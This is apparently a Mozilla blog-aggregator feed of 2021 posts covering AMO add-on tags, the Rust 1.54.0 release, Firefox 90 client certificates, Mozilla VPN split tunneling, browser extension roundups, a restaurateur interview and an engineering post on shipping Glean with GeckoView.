We introduced tagging long ago, but ended up discontinuing it because the way we implemented it wasn’t as useful as we thought. Part of the problem was that it was too open-ended, and anyone could tag any add-on however they wanted. This led to spamming, over-tagging, and general inconsistencies that made it hard for users to get helpful results.

Now we’re bringing tags back, but in a different form. Instead of free-form tags, we’ll provide a set of predefined tags that developers can pick from. We’re starting with a small set of tags based on what we’ve noticed users looking for, so it’s possible many add-ons don’t match any of them. We will expand the list of tags if this feature performs well.

The tags will be displayed on the listing page of the add-on. We also plan to display tagged add-ons in the AMO homepage.

Example of a tag shelf in the AMO homepage

Example of a tag shelf in the AMO homepage

We’re only just starting to roll this feature out, so we might be making some changes to it as we learn more about how it’s used. For now, add-on developers should visit the Developer Hub and set any relevant tags for their add-ons. Any tags that had been set prior to July 22, 2021 were removed when the feature was retooled.

The post New tagging feature for add-ons on AMO appeared first on Mozilla Add-ons Community Blog.

The Rust Programming Language BlogAnnouncing Rust 1.54.0

The Rust team is happy to announce a new version of Rust, 1.54.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, getting Rust 1.54.0 is as easy as:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.54.0 on GitHub.

What's in 1.54.0 stable

Attributes can invoke function-like macros

Rust 1.54 supports invoking function-like macros inside attributes. Function-like macros can be either macro_rules! based or procedural macros which are invoked like macro!(...). One notable use case for this is including documentation from other files into Rust doc comments. For example, if your project's README represents a good documentation comment, you can use include_str! to directly incorporate the contents. Previously, various workarounds allowed similar functionality, but from 1.54 this is much more ergonomic.

#![doc = include_str!("README.md")]

Macros can be nested inside the attribute as well. For example, the concat! macro can be used to construct a doc comment from within a macro that uses stringify! to include substitutions:

macro_rules! make_function {
    ($name:ident, $value:expr) => {
        #[doc = concat!("The `", stringify!($name), "` example.")]
        ///
        /// # Example
        ///
        /// ```
        #[doc = concat!(
            "assert_eq!(", module_path!(), "::", stringify!($name), "(), ",
            stringify!($value), ");")
        ]
        /// ```
        pub fn $name() -> i32 {
            $value
        }
    };
}

make_function! {func_name, 123}

Read here for more details.

wasm32 intrinsics stabilized

A number of intrinsics for the wasm32 platform have been stabilized, which gives access to the SIMD instructions in WebAssembly.

Notably, unlike the previously stabilized x86 and x86_64 intrinsics, these do not have a safety requirement to only be called when the appropriate target feature is enabled. This is because WebAssembly was written from the start to validate code safely before executing it, so instructions are guaranteed to be decoded correctly (or not at all).

This means that we can expose some of the intrinsics as entirely safe functions, for example v128_bitselect. However, there are still some intrinsics which are unsafe because they use raw pointers, such as v128_load.

Incremental Compilation is re-enabled by default

Incremental compilation has been re-enabled by default in this release, after it being disabled by default in 1.52.1.

In Rust 1.52, additional validation was added when loading incremental compilation data from the on-disk cache. This resulted in a number of pre-existing potential soundness issues being uncovered as the validation changed these silent bugs into internal compiler errors (ICEs). In response, the Compiler Team decided to disable incremental compilation in the 1.52.1 patch, allowing users to avoid encountering the ICEs and the underlying unsoundness, at the expense of longer compile times. 1

Since then, we've conducted a series of retrospectives and contributors have been hard at work resolving the reported issues, with some fixes landing in 1.53 and the majority landing in this release. 2

There are currently still two known issues which can result in an ICE. Due to the lack of automated crash reporting, we can't be certain of the full extent of impact of the outstanding issues. However, based on the feedback we received from users affected by the 1.52 release, we believe the remaining issues to be rare in practice.

Therefore, incremental compilation has been re-enabled in this release!

Stabilized APIs

The following methods and trait implementations were stabilized.

Other changes

There are other changes in the Rust 1.54.0 release: check out what changed in Rust, Cargo, and Clippy.

rustfmt has also been fixed in the 1.54.0 release to properly format nested out-of-line modules. This may cause changes in formatting to files that were being ignored by the 1.53.0 rustfmt. See details here.

Contributors to 1.54.0

Many people came together to create Rust 1.54.0. We couldn't have done it without all of you. Thanks!

  1. The 1.52.1 release notes contain a more detailed description of these events.

  2. The tracking issue for the issues is #84970.

Mozilla Security BlogMaking Client Certificates Available By Default in Firefox 90

 

Starting with version 90, Firefox will automatically find and offer to use client authentication certificates provided by the operating system on macOS and Windows. This security and usability improvement has been available in Firefox since version 75, but previously end users had to manually enable it.

When a web browser negotiates a secure connection with a website, the web server sends a certificate to the browser to prove its identity. Some websites (most commonly corporate authentication systems) request that the browser sends a certificate back to it as well, so that the website visitor can prove their identity to the website (similar to logging in with a username and password). This is sometimes called “mutual authentication”.

Starting with Firefox version 90, when you connect to a website that requests a client authentication certificate, Firefox will automatically query the operating system for such certificates and give you the option to use one of them. This feature will be particularly beneficial when relying on a client certificate stored on a hardware token, since you do not have to import the certificate into Firefox or load a third-party module to communicate with the token on behalf of Firefox. No manual task or preconfiguration will be necessary when communicating with your corporate authentication system.

If you are a Firefox user, you don’t have to do anything to benefit from this usability and security improvement to load client certificates. As soon as your Firefox auto-updates to version 90, you can simply select your client certificate when prompted by a website. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the web.

The post Making Client Certificates Available By Default in Firefox 90 appeared first on Mozilla Security Blog.

The Mozilla BlogLalo Luevano, restaurateur and co-founder of Bodega wine bar

On the internet you are never alone, and because of that at Mozilla we know that we can’t work to build a better internet alone. We believe in and rely on our community — from our volunteers, to our staff, to our users, fans and friends. Meet Lalo Luevano, partner and co-founder of Bodega, a natural wine bar in the North Beach neighborhood of San Francisco.

Tell me a little about yourself. 

I was born and raised in Santa Cruz, California. It’s a little surf town, very tight knit, very laid back. I think it rubbed off on me a lot because I’m a laid back sort of person. I’m from a Mexican background. My parents always loved having big barbecues and having lots of friends over. They were involved with fundraisers for my baseball team or my sister’s soccer teams. I always wanted to be part of the production side, getting involved in what we were serving and in the cooking. My dad also loves to cook. He’d be on the grill and I was very much into manning the grill any chance I got. Cooking has been a big part of my family upbringing.

What do you love about cooking?

It’s like my therapy, essentially. I definitely get into a meditative state when cooking. I can just kind of zero in and focus on something and that’s really important to me when I’m doing it. 

How long have you been involved in the restaurant scene?

Right out of college, I went into engineering, working for a defense contractor for about six to eight years. I was living in Santa Clara and I found myself coming to San Francisco quite a bit to indulge in the live music scene, the food and the bars, but never really considered it as a profession or a lifestyle. It just seemed very daunting. Everybody hears the horror stories of restaurants and the failure rate.

By becoming friends with restaurateurs and owners of different places, I started getting the idea that maybe this is something I can do. I met somebody who was a trained chef who invited me to get involved in a pop-up so I could understand how a restaurant works behind the scenes. It was so successful the first time that we ended up doing it seasonally. 

We walked away with a good chunk of change that we weren’t really looking for. The pop-up was just a way to do something fun and have a bunch of friends and feed strangers, and such, but we would still walk away with a good amount of cash, at which point, I think that’s what really gave me the confidence of like saying hey, we can actually open up a spot.

And that led you to Bodega?

Yeah, this space in North Beach in San Francisco just happened to fall on our laps. I caught wind from a friend that this woman was considering selling her business, so I went and checked it out with my business partner, and it was just an amazing location right next to Washington Square Park. We’ve been doing this now for six years, and I’m proud to say, I think we were probably one of the first natural wine bars in the city. We have a really nice curated list of wines and a menu that rotates frequently but it’s really fresh and it’s inventive. It’s a really fun and energetic atmosphere.

What do you enjoy most about being a restaurateur? 

The creativity of it. Like creating the concept itself. I really enjoy how the menu coincides with the wine list and the music. I just love the entire production of it. I feel like I picked the right profession because it’s where I get to have a good time and explore the fun side of my personality. I really enjoy being a curator.

Who inspires you? 

Throughout the pandemic, I was very inspired by — like I’m sure a lot of people were — what David Chang was doing. Here’s a guy who owns some of the best restaurants in the U.S. And he’s posting videos during complete lockdowns on how to keep your scallions going after you’ve used them down to the end. He was doing stuff in the microwave. Or showing how to reuse stuff. I was like this guy’s amazing!

I’m always looking for inspiration. It’s honestly a constant thing. I guess this goes back to my indie sort of roots. I’m a mixtape sort of person. I’m always trying to look a little bit further and deeper. For me it’s not usually on the surface. I really have to dig in to find a pop-up or a chef or something that somebody’s talking about that I have to go through multiple channels in order to find out more. But I enjoy that.

What’s your favorite fun stuff to do online?

I’m a business tech nerd. I’m very much in tune with what’s going on in the valley. That’s still very ingrained in me just being here. I want to know what’s happening and who the movers and shakers are at the moment, or what’s the latest unicorn. That’s always been very fascinating to me.

The restaurant and service industries were hit especially hard during the pandemic, and we’re still in bumpy times. How did things go for you? 

We didn’t know what to expect early on, obviously I don’t think anybody did. At that point we thought it was just going to be a two month thing, and we were prepared for that. We started to realize that a lot of restaurants and places were allowed to do window service. But there was no joy in it. Honestly it was hard to find joy during those times. 

The way we looked at it was that there are so many restaurants and so many concepts that we’ve been inspired by through the years or even places overseas that just do a window and they still bring a lot of joy. That inspired us to just open up the windows, play some music, have a good time with it. We started experimenting with some with some dishes that we were doing. We were doing everything from TV dinner nights with Salisbury steak and potatoes, Jamaican jerk night with chicken, burger night, taco Tuesdays and just being really just creative and fun with the dishes. 

We’d have the music going and have safety in mind with the six foot tape and wear your mask. We could still be playing punk rock or hip hop and you know say hi to people and just have a great time with it. We would post everything the day before to be aligned. I don’t know if it would have been possible without the social media aspect.

The internet has touched restaurants in so many ways, like social media, third party delivery services, review sites and even maintaining a website. How have any of these touched restaurant life for you?

I’ve always had mixed feelings about that. I like that Bodega is the little sexy wine bar on the corner that only so many people know about but we’re always super busy. I’ve always thought that it adds to the mysteriousness of it. I’d rather have people just come in the doors and experience it themselves. Maybe that’s part of the magic that we create.

If budget, time and location were not issues, where would you go for a meal and why?

St. John in London. I’ve never been, but I’ve followed them closely. It just looks like a place I want to go and spend hours just drinking wine and having a good conversation. It looks like they care very much about the details, and I can expect to have a really, really nice dish.

This interview has been edited for length and clarity.

The post Lalo Luevano, restaurateur and co-founder of Bodega wine bar appeared first on The Mozilla Blog.

The Mozilla BlogCelebrating Mozilla VPN: How we’re keeping your data safe for you

A year goes by so quickly, and we have good reason to celebrate. Since our launch last year, Mozilla VPN, our fast and easy-to-use Virtual Private Network service, has expanded to seven countries including Austria, Belgium, France, Germany, Italy, Spain and Switzerland adding to 13 countries where Mozilla VPN is available. We also expanded our VPN service offerings and it’s now available on Windows, Mac, Linux, Android and iOS platforms. We have also given you more payment choices from credit card, paypal or through Apple in-app purchases. Lastly, our list of languages that we support continues to grow, and to date we support 28 languages. Thousands of people have signed up to subscribe to our Mozilla VPN, which provides encryption and device-level protection of your connection and information when you are on the Web.

Developed by Mozilla, a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet, we are committed to innovate and bring new features to the Mozilla VPN through feedback from our community. This year, the team has been working on additional security and customization features which will soon be available to our users. 

Today, we’re launching a new feature, one that’s been requested by many users called split tunneling. This allows you to divide your internet traffic and choose which apps you want to secure through an encrypted VPN tunnel, and which apps you want to connect to an open network. Additionally, we recently released the captive portal feature which allows you to join public Wi-Fi networks securely. We continue to add new features to offer you the flexibility to use Mozilla VPN wherever you go.

Divide and conquer your apps with our split tunneling feature

Today, we’re launching the split tunneling feature so you can choose which apps that you want to use the Mozilla VPN and which ones you want to go through an open network. This allows you to prioritize and choose the internet connections on the apps that you want to continue to be kept safe with the Mozilla VPN. This feature is available on Windows, Linux and Android.

Joining public Wi-Fi networks securely through our captive portal

Recently, we added the option to join public Wi-Fi networks securely. It’s a feature to make sure you can easily use our trustworthy Mozilla VPN service to protect your device and data when you are on a public WiFi network. If your VPN is on and you first connect to the cafe’s public Wi-Fi network, you may be blocked from seeing the cafe or public Wi-Fi’s landing or login page, known as the captive portal. Mozilla VPN will recognize this, and provide a notification to turn off the Mozilla VPN so you can connect through the public Wi-Fi’s landing or login page. Then, once you’re logged in, you’ll receive a notification to click to connect to our Mozilla VPN. This feature is available on Windows, Linux and Android.

New and flexible pricing plans

Recently, we changed our prices after we heard from consumers who wanted more flexibility and different plan options at different price points. As a token of our appreciation to the users who signed up when we first launched last year, we will continue to honor the $4.99 monthly subscription to users in those six countries – the United States, Canada, the United Kingdom, Singapore, Malaysia, and New Zealand. For new customers in those six countries that subscribe after July 14, 2021, they can get the same low cost by signing up for a 12 month subscription. 

We know that it’s more important than ever for you to be safe, and for you to know that what you do online is your own business. By subscribing to Mozilla VPN, users support both Mozilla’s product development and our mission to build a better web for all.  Check out the Mozilla VPN and subscribe today from our website.

The post Celebrating Mozilla VPN: How we’re keeping your data safe for you appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 401

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

What does This Week in Rust mean to you?

This Week in Rust will be the focus of nellshamrell's RustConf keynote in September. She would love if you would help inform the talk by sharing what This Week in Rust means to you on this Reddit post or in the Discourse forums. Thank you!

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research
Miscellaneous

Crate of the Week

This week's crate is loadstone, a bare-metal bootloader for embedded systems.

Thanks to Andres O. Vela for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

287 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week with only improvements. There was one possible regression, but it was removed from consideration due to only barely impacting a somewhat noisy stress-test benchmark. Untriaged pull requests continue to pile up, but there is still not a good process for dealing with them.

Triage done by @rylev. Revision range: 5c0ca08..998cfe5

0 Regressions, 3 Improvements, 0 Mixed; 0 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

No new RFCs were proposed this week.

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

The Tor Project

Stockly

Rhebo GmbH

ChainSafe

Kraken

Lumeo

Tweede golf

Kollider

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

We were able to verify the safety of Rust's type system and thus show how Rust automatically and reliably prevents entire classes of programming errors

Ralf Jung on Eureka Alert Science News

Thanks to Henrik Tougaard for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Firefox Add-on ReviewsTweak Twitch—BetterTTV and other extensions for Twitch customization

Customize chat, optimize your video player, auto-collect channel points, and much much more. Explore some of the ways you can radically transform your Twitch experience with a browser extension… 

BetterTTV

One of the most feature rich and popular Twitch extensions out there, BetterTTV has everything from fun new emoticons to advanced content filtering. 

Key features:

  • Auto-collect channel points
  • Easier-to-read chat interface
  • Select usernames, words, or specific phrases you want highlighted throughout Twitch; or blacklist any of those elements you want filtered out
  • New emoticons to use globally or custom per channel
  • See deleted messages
  • Anonymous Chat—join a channel without notice

Alternative Player for Twitch.tv

While this extension’s focus is on video player customization, Alternate Player for Twitch.tv packs a bunch of other great features unrelated to video streaming. 

Let’s start with the video player. Some of its best tweaks include:

  • Ad blocking! Wipe away all of those suuuuper looooong pre-rolls
  • Choose a new color for the player 
  • Instant Replay is a wow feature—go back and watch up to a minute of material that just streamed (includes ability to speed up/slow down replay) 

Alternate Player for Twitch.tv also appears to run live streams at even smoother rates than Twitch’s default player. You can further optimize your stream by adjusting the extension’s bandwidth settings to better suit your internet speed. Audio Only mode is really great for saving bandwidth if you’re just tuning in for music or discussion. 

Our favorite feature is the ability to customize the size and location of the chat interface while in full-screen mode. Make the chat small and tuck it away in a corner or expand it to consume most of the screen; or remove chat altogether if the side conversation is a mood killer.

Twitch Previews

This is the best way to channel surf. Just hover over a stream icon in the sidebar and Twitch Previews will display its live video in a tiny player. 

No more clicking away from the thing you’re watching just to check out other streams. Additional features we love include the ability to customize the video size and volume of the previews, a sidebar auto-extender (to more easily see all live streamers), and full-screen mode with chat. 

<figcaption>Mouse over a stream in the sidebar to get a live look with Twitch Previews.</figcaption>

Unwanted Twitch

Do you keep seeing the same channels over and over again that you’re not interested in? Unwanted Twitch wipes them from your experience. 

Not only block specific channels you don’t want, but you can even hide entire categories (I’m done with dub step!) or specific tags (my #Minecraft days are behind me). Other niche “hide” features include the ability to block reruns and streams with certain words appearing in their title. 

Twitch Chat Pronouns

What a neat idea. Twitch Chat Pronouns lets you add gender pronouns to usernames. 

The pronouns will display next to Twitch usernames. You’ll need to enter a pronoun for yourself if you want one to appear to other extension users. 

We hope your Twitch experience has been improved with a browser extension! Find more media enhancing extensions on addons.mozilla.org.

Data@MozillaThis Week in Glean: Shipping Glean with GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index (and on the Mozilla Data blog).


Glean SDK

The Glean SDK is Mozilla’s telemetry library, used in most mobile products and now for Firefox Desktop as well. By now it has grown to a sizable code base with a lot of functionality beyond just storing some metric data. Since its first release as a Rust crate in 2019 we managed to move more and more logic from the language SDKs (previously also known as “language bindings”) into the core Rust crate. This allows us to maintain business logic only once and can easily share that across different implementations and platforms. The Rust core is shipped precompiled for multiple target platforms, with the language SDK distributed through the respective package manager.

I talked about how this all works in more detail last year, this year and blogged about it in a previous TWiG.

GeckoView

GeckoView is Mozilla’s alternative implementation for WebViews on Android, based on Gecko, the web engine that also powers Firefox Desktop. It is used as the engine behind Firefox for Android (also called Fenix). The visible parts of what makes up Firefox for Android is written in Kotlin, but it all delegates to the underlying Gecko engine, written in a combination of C++, Rust & JavaScript.

The GeckoView code resides in the mozilla-central repository, next to all the other Gecko code. From there releases are pushed to Mozilla’s own Maven repository.

One Glean too many

Initially Firefox for Android was the only user of the Glean SDK. Up until today it consumes Glean through its release as part of Android Components, a collection of libraries to build browser-like applications.

But the Glean SDK is also available outside of Android Components, as its own package. And additionally it’s available for other languages and platforms too, including a Rust crate. Over the past year we’ve been busy getting Gecko to use Glean through the Rust crate to build its own telemetry on top.

With the Glean SDK used in all these applications we’re in a difficult position: There’s a Glean in Firefox for Android that’s reporting data. Firefox for Android is using Gecko to render the web. And Gecko is starting to use Glean to report data.

That’s one Glean too many if we want coherent data from the full application.

Shipping it all together, take one

Of course we knew about this scenario for a long time. It’s been one of the goals of Project FOG to transparently collect data from Gecko and the embedding application!

We set out to find a solution so that we can connect both sides and have only one Glean be responsible for the data collection & sending.

We started with more detailed planning all the way back in August of last year and agreed on a design in October. Due to changed priorities & availability of people we didn’t get into the implementation phase until earlier this year.

By February I had a first rough prototype in place. When Gecko was shipped as part of GeckoView it would automatically look up the Glean library that is shipped as a dynamic library with the Android application. All function calls to record data from within Gecko would thus ultimately land in the Glean instance that is controlled by Fenix. Glean and the abstraction layer within Gecko would do the heavy work, but users of the Glean API would notice no difference, except their data would now show up in pings sent from Fenix.

This integration was brittle. It required finding the right dynamic library, looking up symbols at runtime as well as reimplementing all metric types to switch to the FFI API in a GeckoView build. We abandoned this approach and started looking for a better one.

Shipping it all together, take two

After the first failed approach the issue was acknowledged by other teams, including the GeckoView and Android teams.

Glean is not the only Rust project shipped for mobile, the application-services team is also shipping components written in Rust. They bundle all components into a single library, dubbed the megazord. This reduces its size (dependencies & the Rust standard library are only linked once) and simplifies shipping, because there’s only one library to ship. We always talked about pulling in Glean as well into such a megazord, but ultimately didn’t do it (except for iOS builds).

With that in mind we decided it’s now the time to design a solution, so that eventually we can bundle multiple Rust components in a single build. We came up with the following plan:

  • The Glean Kotlin SDK will be split into 2 packages: a glean-native package, that only exists to ship the compiled Rust library, and a glean package, that contains the Kotlin code and has a dependency on glean-native.
  • The GeckoView-provided libxul library (that’s “Gecko”) will bundle the Glean Rust library and export the C-compatible FFI symbols, that are used by the Glean Kotlin SDK to call into Glean core.
  • The GeckoView Kotlin package will then use Gradle capabilities to replace the glean-native package with itself (this is actually handle by the Glean Gradle plugin).

Consumers such as Fenix will depend on both GeckoView and Glean. At build time the Glean Gradle plugin will detect this and will ensure the glean-native package, and thus the Glean library, is not part of the build. Instead it assumes libxul from GeckoView will take that role.

This has some advantages. First off everything is compiled together into one big library. Rust code gets linked together and even Rust consumers within Gecko can directly use the Glean Rust API. Next up we can ensure that the version of the Glean core library matches the Glean Kotlin package used by the final application. It is important that the code matches, otherwise calling native functions could lead to memory or safety issues.

Glean is running ahead here, paving the way for more components to be shipped the same way. Eventually the experimentation SDK called Nimbus and other application-services components will start using the Rust API of Glean. This will require compiling Glean alongside them and that’s the exact case that is handled in mozilla-central for GeckoView then.

Now the unfortunate truth is: these changes have not landed yet. It’s been implemented for both the Glean SDK and mozilla-central, but also requires changes for the build system of mozilla-central. Initially that looked like simple changes to adopt the new bundling, but it turned into bigger changes across the board. Some of the infrastructure used to build and test Android code from mozilla-central was untouched for years and thus is very outdated and not easy to change. With everything else going on for Firefox it’s been a slow process to update the infrastructure, prepare the remaining changes and finally getting this landed.

But we’re close now!

Big thanks to Agi for connecting the right people, driving the initial design and helping me with the GeckoView changes. He also took on the challenge of changing the build system. And also thanks to chutten for his reviews and input. He’s driving the FOG work forward and thus really really needs us to ship GeckoView support.

Jan-Erik RedigerThis Week in Glean: Shipping Glean with GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.


Glean SDK

The Glean SDK is Mozilla's telemetry library, used in most mobile products and now for Firefox Desktop as well. By now it has grown to a sizable code base with a lot of functionality beyond just storing some metric data. Since its first release as a Rust crate in 2019 we managed to move more and more logic from the language SDKs (previously also known as "language bindings") into the core Rust crate. This allows us to maintain business logic only once and can easily share that across different implementations and platforms. The Rust core is shipped precompiled for multiple target platforms, with the language SDK distributed through the respective package manager.

I talked about how this all works in more detail last year, this year and blogged about it in a previous TWiG.

GeckoView

GeckoView is Mozilla's alternative implementation for WebViews on Android, based on Gecko, the web engine that also powers Firefox Desktop. It is used as the engine behind Firefox for Android (also called Fenix). The visible parts of what makes up Firefox for Android is written in Kotlin, but it all delegates to the underlying Gecko engine, written in a combination of C++, Rust & JavaScript.

The GeckoView code resides in the mozilla-central repository, next to all the other Gecko code. From there releases are pushed to Mozilla's own Maven repository.

One Glean too many

Initially Firefox for Android was the only user of the Glean SDK. Up until today it consumes Glean through its release as part of Android Components, a collection of libraries to build browser-like applications.

But the Glean SDK is also available outside of Android Components, as its own package. And additionally it's available for other languages and platforms too, including a Rust crate. Over the past year we've been busy getting Gecko to use Glean through the Rust crate to build its own telemetry on top.

With the Glean SDK used in all these applications we're in a difficult position: There's a Glean in Firefox for Android that's reporting data. Firefox for Android is using Gecko to render the web. And Gecko is starting to use Glean to report data.

That's one Glean too many if we want coherent data from the full application.

Shipping it all together, take one

Of course we knew about this scenario for a long time. It's been one of the goals of Project FOG to transparently collect data from Gecko and the embedding application!

We set out to find a solution so that we can connect both sides and have only one Glean be responsible for the data collection & sending.

We started with more detailed planning all the way back in August of last year and agreed on a design in October. Due to changed priorities & availability of people we didn't get into the implementation phase until earlier this year.

By February I had a first rough prototype in place. When Gecko was shipped as part of GeckoView it would automatically look up the Glean library that is shipped as a dynamic library with the Android application. All function calls to record data from within Gecko would thus ultimately land in the Glean instance that is controlled by Fenix. Glean and the abstraction layer within Gecko would do the heavy work, but users of the Glean API would notice no difference, except their data would now show up in pings sent from Fenix.

This integration was brittle. It required finding the right dynamic library, looking up symbols at runtime as well as reimplementing all metric types to switch to the FFI API in a GeckoView build. We abandoned this approach and started looking for a better one.

Shipping it all together, take two

After the first failed approach the issue was acknowledged by other teams, including the GeckoView and Android teams.

Glean is not the only Rust project shipped for mobile, the application-services team is also shipping components written in Rust. They bundle all components into a single library, dubbed the megazord. This reduces its size (dependencies & the Rust standard library are only linked once) and simplifies shipping, because there's only one library to ship. We always talked about pulling in Glean as well into such a megazord, but ultimately didn't do it (except for iOS builds).

With that in mind we decided it's now the time to design a solution, so that eventually we can bundle multiple Rust components in a single build. We came up with the following plan:

  • The Glean Kotlin SDK will be split into 2 packages: a glean-native package, that only exists to ship the compiled Rust library, and a glean package, that contains the Kotlin code and has a dependency on glean-native.
  • The GeckoView-provided libxul library (that's "Gecko") will bundle the Glean Rust library and export the C-compatible FFI symbols, that are used by the Glean Kotlin SDK to call into Glean core.
  • The GeckoView Kotlin package will then use Gradle capabilities to replace the glean-native package with itself (this is actually handle by the Glean Gradle plugin).

Consumers such as Fenix will depend on both GeckoView and Glean. At build time the Glean Gradle plugin will detect this and will ensure the glean-native package, and thus the Glean library, is not part of the build. Instead it assumes libxul from GeckoView will take that role.

This has some advantages. First off everything is compiled together into one big library. Rust code gets linked together and even Rust consumers within Gecko can directly use the Glean Rust API. Next up we can ensure that the version of the Glean core library matches the Glean Kotlin package used by the final application. It is important that the code matches, otherwise calling native functions could lead to memory or safety issues.

Glean is running ahead here, paving the way for more components to be shipped the same way. Eventually the experimentation SDK called Nimbus and other application-services components will start using the Rust API of Glean. This will require compiling Glean alongside them and that's the exact case that is handled in mozilla-central for GeckoView then.

Now the unfortunate truth is: these changes have not landed yet. It's been implemented for both the Glean SDK and mozilla-central, but also requires changes for the build system of mozilla-central. Initially that looked like simple changes to adopt the new bundling, but it turned into bigger changes across the board. Some of the infrastructure used to build and test Android code from mozilla-central was untouched for years and thus is very outdated and not easy to change. With everything else going on for Firefox it's been a slow process to update the infrastructure, prepare the remaining changes and finally getting this landed.

But we're close now!

Big thanks to Agi for connecting the right people, driving the initial design and helping me with the GeckoView changes. He also took on the challenge of changing the build system. And also thanks to chutten for his reviews and input. He's driving the FOG work forward and thus really really needs us to ship GeckoView support.

The Mozilla BlogSpace Cowboy, Guardians of Cleveland, and Tony Award winner Ellen Barkin considers a Subtack – here is this week’s Top Shelf.

At Mozilla, we believe part of making the internet we want is celebrating the best of the internet, and that can be as simple as sharing a tweet that made us pause in our feed. Twitter isn’t perfect, but there are individual tweets that come pretty close.

Each week in Top Shelf, we will be sharing the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution each week.

Here’s what made it to the Top Shelf for the week of July 19, 2021, in no particular order.

Pocket Joy List Project

Discover the best of the internet every day with Pocket

Check out Pocket

The post Space Cowboy, Guardians of Cleveland, and Tony Award winner Ellen Barkin considers a Subtack – here is this week’s Top Shelf. appeared first on The Mozilla Blog.

Firefox Add-on ReviewsToo many open tabs? Extensions to the rescue!

The first step in getting help with your tab hoarding problem is to admit you have a tab hoarding problem. Whatever the reason may be—your job requires you to have dozens of open tabs or the rows of tabs represent your neverending “read later” list—you can regain control of this spiraling situation with the right browser extension. 

Tree Style Tab

Organize your tabs into a clean, cascading “tree” format. Tree Style Tab opens new tabs as “branches” of the parent tab, so all of your open tabs are automatically organized in an easy-to-glance tree branch layout. 

If you’re someone who likes to visually organize information, Tree Style Tab can be a real game changer. It’s very simple to use—just drag n drop different branches to reorganize your clusters of open tabs. 

<figcaption>Tree Style Tab keeps your tabs tucked away in a tidy sidebar. </figcaption>

OneTab

For the times you suddenly find yourself overwhelmed with a bazillion open tabs, OneTab is your page overload panic button. 

Just hit OneTab’s toolbar button and all open tabs get tucked away into a single scrollable page. Save major CPU and memory with all pages now dormant. Reactivate them one by one or all at once. 

<figcaption>With the click of a mouse OneTab turns all your open tabs into a single list on a page.</figcaption>

Tab Stash

Click the Tab Stash toolbar button and bam!—all those open tabs get stored as bookmarks, which presents intriguing possibilities. 

With tabs temporarily saved as bookmarks listed in a foldaway sidebar menu, you’re free to treat them as either easily navigable links to your previously open tabs, or save them permanently as individual or grouped bookmarks. Firefox Sync users will automatically have their Tab Stash bookmarks synced to other devices. 

<figcaption>Tab Stash elegantly organizes tab overload. </figcaption>

Simple Tab Groups

Great for dealing with lots (and lots) of tab groupings, Simple Tab Groups gives you an easy way to navigate a bunch of tab clusters. 

Click the extension’s toolbar button to pull up a menu that lets you easily navigate your groups of open tabs, or specific pages. If you deal with a mass volume of open tabs—like say hundreds of tabs organized across a couple dozen groups—Simple Tab Groups is the extension for you. 

<figcaption>Simple Tab Groups is great for dealing with a huge volume of tabs. </figcaption>

Tab Session Manager

Save and restore the full state of batches of open tabs with Tab Session Manager

If you find yourself opening a lot of new windows and filling them up with open tabs, Tab Session Manager lets you easily save the state of the entire window and its tabs so you’re free to close it down altogether until future recall. The extension also supports auto-save features, cloud sync, session import/export, and more. 

Tab Reloader

Do you have a need for frequent page refreshes across numerous tabs? Maybe you’re in a shopping queue waiting for limited availability items? Perhaps you want a news feed refreshed consistently? Whatever your reason, Tab Reloader gives you the ability to set your own custom time intervals for page refreshes. 

The extension gives you great individual page control. Additional features include:

  • Set different reload time intervals per page, or per a group of tabs within the same window
  • Set reloading to occur if pages are active or not
  • Create custom reload rules for tabs within designated hostnames
  • Manage everything conveniently from a toolbar menu
  • Choose to automatically start your view at the bottom of a freshly reloaded page, should new content appear there

Auto Tab Discard

Laser focused on a singularly important task, Auto Tab Discard simply suspends all activity for any background tabs, saving you CPU and memory load. 

A streamlined toolbar menu allows for a few other handy actions as well, like discarding specific tabs you don’t need anymore, whitelisting domains so you never accidentally discard them, retrieving accidentally discarded tabs, and more. 

Best of luck retaking control of all those tabs! Explore more tab extensions on addons.mozilla.org

Mozilla Performance BlogPerformance Sheriff Newsletter (June 2021)

In June there were 119 alerts generated, resulting in 22 regression bugs being filed on average 3.7 days after the regressing change landed.

Welcome to the June 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by an update on automated backfills for regressions. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.2 days
  • 87% of alerts were triaged within 3 days
